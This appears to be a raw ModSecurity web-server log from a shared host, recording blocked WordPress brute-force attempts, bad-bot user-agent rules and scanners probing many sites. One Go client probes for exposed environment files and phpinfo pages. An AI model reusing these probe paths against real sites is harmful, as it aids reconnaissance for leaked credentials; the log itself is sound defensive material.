[Tue May 26 18:46:08.190343 2026] [security2:error] [pid 1025417:tid 1025583] [client 4.204.220.190:26760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/one.php"] [unique_id "ahWdGFHbArxonFeMXvQa4wAAACQ"]
[Tue May 26 18:46:08.545183 2026] [security2:error] [pid 1025417:tid 1025549] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdGFHbArxonFeMXvQa4gAAAAI"]
[Tue May 26 18:46:08.648164 2026] [security2:error] [pid 1025417:tid 1025454] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/env.dev.js"] [unique_id "ahWdGFHbArxonFeMXvQa8QAAPyQ"]
[Tue May 26 18:46:08.801443 2026] [security2:error] [pid 1025417:tid 1025592] [client 4.204.220.190:46548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-temp.php"] [unique_id "ahWdGFHbArxonFeMXvQa_AAAAC0"]
[Tue May 26 18:46:08.801554 2026] [security2:error] [pid 1025417:tid 1025592] [client 4.204.220.190:46548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-temp.php"] [unique_id "ahWdGFHbArxonFeMXvQa_AAAAC0"]
[Tue May 26 18:46:08.992937 2026] [security2:error] [pid 1025417:tid 1025458] [remote 103.166.184.148:48988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWdGFHbArxonFeMXvQa9QAAPig"]
[Tue May 26 18:46:09.136664 2026] [security2:error] [pid 1025417:tid 1025463] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdGFHbArxonFeMXvQa_gAASi0"]
[Tue May 26 18:46:09.136916 2026] [security2:error] [pid 1025417:tid 1025621] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdGFHbArxonFeMXvQa_gAASi0"]
[Tue May 26 18:46:09.340577 2026] [security2:error] [pid 1025417:tid 1025587] [client 4.204.220.190:49553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/blocks/buttons/"] [unique_id "ahWdGVHbArxonFeMXvQbFAAAACg"]
[Tue May 26 18:46:09.415729 2026] [security2:error] [pid 1025417:tid 1025616] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdGVHbArxonFeMXvQbFQAAAEU"]
[Tue May 26 18:46:09.657522 2026] [security2:error] [pid 1025417:tid 1025663] [client 4.204.220.190:49553] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/xmu.php"] [unique_id "ahWdGVHbArxonFeMXvQbHAAAAHQ"]
[Tue May 26 18:46:09.657645 2026] [security2:error] [pid 1025417:tid 1025663] [client 4.204.220.190:49553] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/xmu.php"] [unique_id "ahWdGVHbArxonFeMXvQbHAAAAHQ"]
[Tue May 26 18:46:10.166319 2026] [security2:error] [pid 1025417:tid 1025607] [client 4.204.220.190:16701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/mode.php"] [unique_id "ahWdGlHbArxonFeMXvQbLAAAADw"]
[Tue May 26 18:46:10.166450 2026] [security2:error] [pid 1025417:tid 1025607] [client 4.204.220.190:16701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/mode.php"] [unique_id "ahWdGlHbArxonFeMXvQbLAAAADw"]
[Tue May 26 18:46:10.199776 2026] [security2:error] [pid 1025417:tid 1025589] [client 52.59.43.236:44870] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWdGVHbArxonFeMXvQbHgAAACo"], referer: https://thegoodsporting.com
[Tue May 26 18:46:10.318688 2026] [security2:error] [pid 1025417:tid 1025468] [remote 103.166.184.148:48988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.184.166.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWdGlHbArxonFeMXvQbLgAAdjI"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:46:10.971858 2026] [security2:error] [pid 1025417:tid 1025642] [client 4.204.220.190:16724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahWdGlHbArxonFeMXvQbOAAAAF8"]
[Tue May 26 18:46:10.971978 2026] [security2:error] [pid 1025417:tid 1025642] [client 4.204.220.190:16724] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahWdGlHbArxonFeMXvQbOAAAAF8"]
[Tue May 26 18:46:10.982793 2026] [security2:error] [pid 1025417:tid 1025471] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/env.development.js"] [unique_id "ahWdGlHbArxonFeMXvQbOQAARzU"]
[Tue May 26 18:46:11.604851 2026] [security2:error] [pid 1025417:tid 1025599] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdG1HbArxonFeMXvQbPwAAADQ"]
[Tue May 26 18:46:11.699606 2026] [security2:error] [pid 1025417:tid 1025472] [remote 144.126.139.83:46488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdG1HbArxonFeMXvQbSAAASzY"]
[Tue May 26 18:46:11.723356 2026] [security2:error] [pid 1025417:tid 1025477] [remote 162.214.206.32:58376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWdG1HbArxonFeMXvQbSgAAATs"]
[Tue May 26 18:46:12.255536 2026] [security2:error] [pid 1025417:tid 1025480] [remote 144.126.139.83:46488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdHFHbArxonFeMXvQbYQAAAz4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:46:12.967713 2026] [security2:error] [pid 1025417:tid 1025481] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/env.js"] [unique_id "ahWdHFHbArxonFeMXvQbdgAALj8"]
[Tue May 26 18:46:13.677128 2026] [security2:error] [pid 1025417:tid 1025583] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdHVHbArxonFeMXvQbgQAAACQ"]
[Tue May 26 18:46:14.136377 2026] [security2:error] [pid 1025417:tid 1025595] [client 85.208.96.198:16510] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-15th/day/2025-03-16/"] [unique_id "ahWdHlHbArxonFeMXvQblAAAADA"]
[Tue May 26 18:46:14.136531 2026] [security2:error] [pid 1025417:tid 1025595] [client 85.208.96.198:16510] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-15th/day/2025-03-16/"] [unique_id "ahWdHlHbArxonFeMXvQblAAAADA"]
[Tue May 26 18:46:14.859349 2026] [security2:error] [pid 1025417:tid 1025651] [client 66.132.172.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWdHlHbArxonFeMXvQbqAAAAGg"]
[Tue May 26 18:46:14.961053 2026] [security2:error] [pid 1025417:tid 1025486] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/env.prod.js"] [unique_id "ahWdHlHbArxonFeMXvQbrAAASUQ"]
[Tue May 26 18:46:15.558646 2026] [security2:error] [pid 1025417:tid 1025654] [client 107.170.66.128:63784] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWdH1HbArxonFeMXvQbvwAAAGs"]
[Tue May 26 18:46:15.572096 2026] [security2:error] [pid 1025417:tid 1025490] [remote 162.214.206.32:58376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWdH1HbArxonFeMXvQbwAAAeEg"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:46:16.762736 2026] [security2:error] [pid 1025417:tid 1025664] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdIFHbArxonFeMXvQb0wAAAHU"]
[Tue May 26 18:46:16.821356 2026] [security2:error] [pid 1025417:tid 1025498] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/env.production.js"] [unique_id "ahWdIFHbArxonFeMXvQb4QAATVA"]
[Tue May 26 18:46:17.906507 2026] [security2:error] [pid 1025417:tid 1025604] [client 152.232.72.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdIFHbArxonFeMXvQb3gAAADk"], referer: https://www.anujtradingco.com/
[Tue May 26 18:46:18.654723 2026] [security2:error] [pid 1025417:tid 1025505] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/static/js/main.js"] [unique_id "ahWdIlHbArxonFeMXvQcEwAADVc"]
[Tue May 26 18:46:18.924078 2026] [security2:error] [pid 1025417:tid 1025624] [client 152.232.72.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdIlHbArxonFeMXvQcHQAAAE0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1470640&moderation-hash=e472e790e61b9f384f13fa9f26fb58af
[Tue May 26 18:46:19.280878 2026] [security2:error] [pid 1025417:tid 1025550] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdIlHbArxonFeMXvQcIAAAAAM"]
[Tue May 26 18:46:19.674877 2026] [security2:error] [pid 1025417:tid 1025515] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdI1HbArxonFeMXvQcNAAATmE"]
[Tue May 26 18:46:19.675011 2026] [security2:error] [pid 1025417:tid 1025625] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdI1HbArxonFeMXvQcNAAATmE"]
[Tue May 26 18:46:19.960210 2026] [security2:error] [pid 1025417:tid 1025509] [remote 211.23.68.235:25641] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWdI1HbArxonFeMXvQcOAAAL1s"]
[Tue May 26 18:46:20.161130 2026] [security2:error] [pid 1025417:tid 1025558] [client 123.24.68.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdI1HbArxonFeMXvQcNwAAAAs"]
[Tue May 26 18:46:20.547896 2026] [security2:error] [pid 1025417:tid 1025518] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/static/js/bundle.js"] [unique_id "ahWdJFHbArxonFeMXvQcTwAADWQ"]
[Tue May 26 18:46:21.575135 2026] [security2:error] [pid 1025417:tid 1025653] [client 152.232.72.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWdJVHbArxonFeMXvQcbQAAAGo"], referer: https://anujtradingco.com
[Tue May 26 18:46:21.777890 2026] [security2:error] [pid 1025417:tid 1025661] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdJVHbArxonFeMXvQcZwAAAHI"]
[Tue May 26 18:46:22.428267 2026] [security2:error] [pid 1025417:tid 1025519] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/static/js/main.chunk.js"] [unique_id "ahWdJlHbArxonFeMXvQciAAADmU"]
[Tue May 26 18:46:23.830798 2026] [security2:error] [pid 1025417:tid 1025666] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdJ1HbArxonFeMXvQcrwAAAHc"]
[Tue May 26 18:46:24.894964 2026] [security2:error] [pid 1025417:tid 1025419] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/environment.js"] [unique_id "ahWdKFHbArxonFeMXvQczAAAegE"]
[Tue May 26 18:46:26.240879 2026] [security2:error] [pid 1025417:tid 1025534] [remote 103.95.119.103:59274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWdKlHbArxonFeMXvQc8AAATHQ"]
[Tue May 26 18:46:26.771783 2026] [security2:error] [pid 1025417:tid 1025631] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdKlHbArxonFeMXvQc-wAAAFQ"]
[Tue May 26 18:46:26.805172 2026] [security2:error] [pid 1025417:tid 1025645] [client 114.119.157.189:61343] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/site/wp-content/uploads/2020/10/5-1.png"] [unique_id "ahWdKlHbArxonFeMXvQdBwAAAGI"], referer: https://moes-art.com/blog/want-to-develop-a-successful-brand-strategy-heres-how-to-go-about-it/
[Tue May 26 18:46:27.034878 2026] [security2:error] [pid 1025417:tid 1025533] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/scripts/main.js"] [unique_id "ahWdK1HbArxonFeMXvQdDgAANHM"]
[Tue May 26 18:46:29.315136 2026] [security2:error] [pid 1025417:tid 1025629] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdLFHbArxonFeMXvQdTAAAAFI"]
[Tue May 26 18:46:29.501091 2026] [security2:error] [pid 1025417:tid 1025434] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/main.js"] [unique_id "ahWdLVHbArxonFeMXvQdYAAAcxA"]
[Tue May 26 18:46:30.382506 2026] [security2:error] [pid 1025417:tid 1025430] [remote 35.176.253.230:53570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWdLlHbArxonFeMXvQdbgAAQww"]
[Tue May 26 18:46:30.388235 2026] [security2:error] [pid 1025417:tid 1025432] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdLlHbArxonFeMXvQdcgAAfA4"]
[Tue May 26 18:46:30.388394 2026] [security2:error] [pid 1025417:tid 1025671] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdLlHbArxonFeMXvQdcgAAfA4"]
[Tue May 26 18:46:30.642242 2026] [security2:error] [pid 1025417:tid 1025438] [remote 35.176.253.230:53570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWdLlHbArxonFeMXvQdfAAADhQ"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 18:46:31.421920 2026] [security2:error] [pid 1025417:tid 1025448] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_profiler"] [unique_id "ahWdL1HbArxonFeMXvQdjQAAVB4"]
[Tue May 26 18:46:31.904414 2026] [security2:error] [pid 1025417:tid 1025650] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdL1HbArxonFeMXvQdkQAAAGc"]
[Tue May 26 18:46:33.329018 2026] [security2:error] [pid 1025417:tid 1025451] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/_profiler/phpinfo"] [unique_id "ahWdMVHbArxonFeMXvQdwAAAWyE"]
[Tue May 26 18:46:34.350985 2026] [security2:error] [pid 1025417:tid 1025455] [remote 198.244.168.58:44048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "onesoft.in"] [uri "/robots.txt"] [unique_id "ahWdMlHbArxonFeMXvQd2QAAfyU"]
[Tue May 26 18:46:34.351181 2026] [security2:error] [pid 1025417:tid 1025674] [client 198.244.168.58:44048] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "onesoft.in"] [uri "/robots.txt"] [unique_id "ahWdMlHbArxonFeMXvQd2QAAfyU"]
